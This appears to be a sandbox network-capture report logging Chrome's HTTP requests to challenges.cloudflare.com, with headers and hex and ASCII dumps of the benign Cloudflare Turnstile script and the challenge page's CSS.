                                                  Date: Mon, 09 Dec 2024 08:34:43 GMT
                                                  Content-Type: application/javascript; charset=UTF-8
                                                  Content-Length: 47692
                                                  Connection: close
                                                  accept-ranges: bytes
                                                  last-modified: Tue, 03 Dec 2024 18:31:41 GMT
                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                  access-control-allow-origin: *
                                                  cross-origin-resource-policy: cross-origin
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a85b48ae1891-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:43 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                  Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                  Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                  Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                  Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                  Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                  Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                  Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.449754104.18.94.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:42 UTC795OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/ HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-Dest: iframe
                                                  Referer: https://or.smelsgycz.ru/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:43 UTC1362INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:34:43 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 26677
                                                  Connection: close
                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                  content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                  cross-origin-embedder-policy: require-corp
                                                  cross-origin-opener-policy: same-origin
                                                  cross-origin-resource-policy: cross-origin
                                                  origin-agent-cluster: ?1
                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                  referrer-policy: same-origin
                                                  document-policy: js-profiling
                                                  2024-12-09 08:34:43 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 66 33 61 38 35 62 37 62 66 65 30 66 61 37 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                  Data Ascii: Server: cloudflareCF-RAY: 8ef3a85b7bfe0fa7-EWRalt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:43 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64
                                                  Data Ascii: ding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30
                                                  Data Ascii: troke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#0
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b
                                                  Data Ascii: -dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65
                                                  Data Ascii: 0}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-he
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33
                                                  Data Ascii: stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de13
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70
